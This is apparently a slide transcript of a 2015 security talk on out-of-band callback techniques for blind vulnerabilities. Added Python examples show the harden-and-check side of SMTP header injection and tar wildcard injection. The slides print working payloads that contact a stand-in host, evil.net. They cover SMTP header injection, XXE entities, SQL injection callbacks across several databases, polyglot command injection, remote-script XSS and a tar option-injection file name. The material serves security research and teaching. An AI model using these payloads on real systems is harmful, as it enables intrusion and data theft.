44CON London 2015 - Hunting Asynchronous Vulnerabilities
Hunting Asynchronous Vulnerabilities by James Kettle
1.
HUNTING ASYNCHRONOUS VULNERABILITIES
James Kettle
2.
©PortSwigger Ltd 2015 All Rights Reserved
THE CLASSICAL CALLBACK
From: no-reply@redacted.com
To: James Kettle
Subject: Order: 103092185

Hi test,
Thank you for your recent order…

Description     Quantity  Price    VAT      Total
Leather Jacket  1         £824.33  £164.87  £989.20
3.
OVERVIEW
• The asynchronous problem
• Callback oriented hacking
  • Direct - XML/SQL
  • Chained - SQL
  • Destructive - SQL
  • Polyglot - OS/XSS
  • Interactive
• Hazards
• Q&A
4.
THE ASYNCHRONOUS PROBLEM
• Many asynchronous vulnerabilities are invisible

Visible errors      ✘
Result output       ✘
Time side-channel   ✘
5.
THE ASYNCHRONOUS PROBLEM
• Blind + background thread
  • Nightly cronjob
• Blind + event-triggered
  • Second order SQLi, command injection…
  • Blind XSS
• Blind + no time delay
  • Blind XXE, XPath…
6.
THE ASYNCHRONOUS SOLUTION
• Callbacks!
• Why DNS?
  • Rarely filtered outbound
  • Underpins most network protocols
7.
PAYLOAD DEVELOPMENT
8.
THE INDOMITABLE PAYLOAD
• Callback exploits fail hard
• Quality of Payload is crucial
• Environment-insensitive
• Multi context (aka “polyglot”)
• Filter-resistant
• Simple.
9.
SMTP HEADER INJECTION
foo%0ABCC: hacker@evil.net
[Diagram: Website, Attacker, User]
10.
SMTP HEADER INJECTION
%0AReply-To: hacker@evil.net%0A%0A<zip_bomb>
[Diagram: Website, Attacker, User]
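The two SMTP header injection slides, seen from the code that builds the e-mail. This is an added example, not code from the talk: the sender address, the recipient and all function names are assumptions, and the two inputs are the slides' own strings after URL decoding.

```python
from email import message_from_string
from email.message import EmailMessage
from urllib.parse import unquote

SENDER = "no-reply@shop.example"  # constructed sender address


def build_unsafe(to_addr, customer_name):
    """Vulnerable pattern: form input is concatenated straight into header lines."""
    return (
        f"From: {SENDER}\r\n"
        f"To: {to_addr}\r\n"
        f"Subject: Order confirmation for {customer_name}\r\n"
        "\r\n"
        "Thank you for your recent order.\r\n"
    )


def check_header_value(value):
    """Reject any value that could terminate the current header line."""
    if any(ch in value for ch in "\r\n\x00"):
        raise ValueError("line break or NUL in header value")
    return value


def build_safe(to_addr, customer_name):
    """Hardened pattern: validate first, then let the email library serialise."""
    msg = EmailMessage()
    msg["From"] = SENDER
    msg["To"] = check_header_value(to_addr)
    msg["Subject"] = "Order confirmation for " + check_header_value(customer_name)
    msg.set_content("Thank you for your recent order.")
    return msg


def parsed_view(raw):
    """Parse a raw message as a receiving server would: header names and body."""
    msg = message_from_string(raw)
    return [name.lower() for name in msg.keys()], msg.get_payload()


# Form values as the application sees them after URL decoding.
BCC_INPUT = unquote("foo%0ABCC: hacker@evil.net")
BODY_INPUT = unquote("%0AReply-To: hacker@evil.net%0A%0A<zip_bomb>")

if __name__ == "__main__":
    for label, value in (("bcc", BCC_INPUT), ("body", BODY_INPUT)):
        headers, body = parsed_view(build_unsafe("customer@example.com", value))
        print(label, "unsafe headers:", headers)
        print(label, "unsafe body starts with:", repr(body[:12]))
        try:
            build_safe("customer@example.com", value)
        except ValueError as exc:
            print(label, "safe builder rejected input:", exc)
```

Nothing in the HTTP response differs between the two builders, which is why the check belongs at the point where the header is built rather than in response monitoring.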
11.
<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xml" href="http://xsl.evil.net/a.xsl"?>
<!DOCTYPE root PUBLIC "-//A/B/EN" "http://dtd.evil.net/a.dtd" [
  <!ENTITY % remote SYSTEM "http://xxe2.evil.net/a">
  <!ENTITY xxe SYSTEM "http://xxe1.evil.net/a">
  %remote;
]>
<root>
  <foo>&xxe;</foo>
  <x xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://xi.evil.net/" ></x>
  <y xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://schemalocation.evil.net/a.xsd">a</y>
</root>
12.
SQLi: POSTGRES
copy (select '') to program 'nslookup evil.net'
13.
SQLi: SQLITE3
• ;attach database '//evil.net/z' as 'z'-- -
  • Windows only
  • Requires batched queries
  • Can also be used to create files
• (SELECT load_extension('//foo'))
  • Windows only
  • Frequently disabled
  • By @0x7674
14.
SQLi: MSSQL
SELECT * FROM openrowset('SQLNCLI', 'evil.net';'a', 'select 1 from dual');
  • Requires 'ad hoc distributed queries'
EXEC master.dbo.xp_fileexist 'evil.netfoo'
  • Requires sysadmin privs
BULK INSERT mytable FROM 'evil.net$file';
  • Requires bulk insert privs
EXEC master.dbo.xp_dirtree 'evil.netfoo'
  • Checks privileges after DNS lookup
15.
SQLi: ORACLE
• UTL_HTTP, UTL_TCP, UTL_SMTP, UTL_INADDR, UTL_FILE…
  • Require assorted privileges
• SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://evil.net/"> %remote;]>'),'/l')
  • From https://bog.netspi.com/advisory-xxe-injection-oracle-database-cve-2014-6577/
  • No privileges required!
  • Patched eventually
16.
SQLi: MySQL
• LOAD_FILE('evil.netfoo')
  • Windows only
• SELECT … INTO OUTFILE 'evil.netfoo'
  • Windows only
17.
WRITE-BASED CALLBACKS
• Drop web shell
• Requires path
• Risky
• Maildrop
• Microsoft Outlook only
• Printer spool
• Requires employee credulity
• Requires root
• Bypasses outbound network filtering
• Config files?
18.
CONFIG
File Name:            /etc/my.cnf, /etc/mysql/my.cnf, SYSCONFDIR/my.cnf, $MYSQL_HOME/my.cnf, ~/.my.cnf
Command-Line Format:  --bind-address=addr
Permitted Values:     Type string, Default 0.0.0.0
“If addr is a host name, the server resolves the name to an IPv4 address and binds to that address.”
19.
ASYNCHRONOUS COMMAND INJECTION
• Bash:
  $ command arg1 input arg3
  $ command arg1 'input' arg3
  $ command arg1 "input" arg3
• Windows:
  >command arg1 input arg3
  >command arg1 "input" arg3
20.
POLYGLOT COMMAND INJECTION
21.
POLYGLOT COMMAND INJECTION
22.
POLYGLOT COMMAND INJECTION
23.
POLYGLOT COMMAND INJECTION
24.
&nslookup evil.net&'"`0&nslookup evil.net&`'
bash   : &nslookup evil.net&'"`0&nslookup evil.net&`'
bash " : &nslookup evil.net&'"`0&nslookup evil.net&`'
bash ' : &nslookup evil.net&'"`0&nslookup evil.net&`'
win    : &nslookup evil.net&'"`0&nslookup evil.net&`'
win "  : &nslookup evil.net&'"`0&nslookup evil.net&`'
Key: ignored / context-breakout / dud-statement / injected-command / ignored
25.
POLYGLOT XSS
• “One vector to rule them all” by @garethheyes
javascript:/*-- >]]>%>?></script></title></textarea></noscript></style></xmp>"> [img=1,name=/alert(1)/.source]<img - /style=a:expression(/*'/- /*',/**/eval(name)/*%2A///*///);width:100%;height:100%;p osition:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"
• Problems:
  • Length
  • Fragile
26.
POLYGLOT XSS
</script><svg/onload=
'+/"/+/onmouseover=1/
+(s=document.createElement(/script/.source),
s.stack=Error().stack,
s.src=(/,/+/evil.net/).slice(2),
document.documentElement.appendChild(s))//'>
27.
BLIND XSS
• Sleepy Puppy
  • Allows custom script+payload injection
  • Webserver in docker container
  • https://github.com/Netflix/sleepy-puppy
28.
PROOF OF EXPLOIT
Scenario: you can upload [anything].jpg
Hypothesis: images archived with 'tar [options] *'
The exploit: --use-compress-program=nslookup evil.net -domain=a.jpg
Variants exist for targeting zip, rsync, etc
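Why the hypothesised `tar [options] *` job is exposed, and two ways to close it, as an added example that is not from the talk. The archive path, the function names and the upload allow-list are assumptions; the sample file names are constructed, with the option-like one taken from the slide.

```python
import re

# Hypothetical nightly archive job: tar -cf <archive> *
ARCHIVE_CMD = ["tar", "-cf", "/var/backups/uploads.tar"]


def expand_like_shell(names):
    """Emulate the shell expanding '*': sorted names, dotfiles skipped.

    Real shells sort by locale; code-point order is close enough here.
    The key property is that each file name becomes one argv element.
    """
    return sorted(n for n in names if not n.startswith("."))


def unsafe_argv(names):
    """What the job runs when the command line ends in a bare '*'."""
    return ARCHIVE_CMD + expand_like_shell(names)


def operands_read_as_options(argv):
    """Operands an option parser treats as options: leading '-' before any '--'."""
    flagged = []
    for arg in argv[len(ARCHIVE_CMD):]:
        if arg == "--":
            break  # everything after '--' is a file operand
        if arg.startswith("-"):
            flagged.append(arg)
    return flagged


def hardened_argv(names):
    """Fix at archive time: end option parsing and anchor every name with './'."""
    return ARCHIVE_CMD + ["--"] + ["./" + n for n in expand_like_shell(names)]


# Fix at upload time: assumed allow-list for stored image names.
SAFE_UPLOAD_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,100}\.jpg")


def accept_upload_name(name):
    """Accept only names that start with an alphanumeric and contain no spaces."""
    return SAFE_UPLOAD_NAME.fullmatch(name) is not None


# Constructed upload directory listing.
SAMPLE_UPLOADS = [
    "cat.jpg",
    "--use-compress-program=nslookup evil.net -domain=a.jpg",
    "dog.jpg",
    ".hidden.jpg",
]

if __name__ == "__main__":
    print("unsafe argv:  ", unsafe_argv(SAMPLE_UPLOADS))
    print("read as opts: ", operands_read_as_options(unsafe_argv(SAMPLE_UPLOADS)))
    print("hardened argv:", hardened_argv(SAMPLE_UPLOADS))
    print("after fix:    ", operands_read_as_options(hardened_argv(SAMPLE_UPLOADS)))
    for name in SAMPLE_UPLOADS:
        print("accept" if accept_upload_name(name) else "reject", repr(name))
```

Either fix is sufficient on its own; applying both means a rename or a second archiving tool does not reopen the issue.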
29.
---LIVE DEMO---
30.
HAZARDS
• Friendly fire
• URL grepping
• Scope
31.
TAKE-AWAYS
Asynchronous exploits fail silently
Quality of Payload is crucial
Invisible ⇏ unhackable
@albinowax
james.kettle@portswigger.net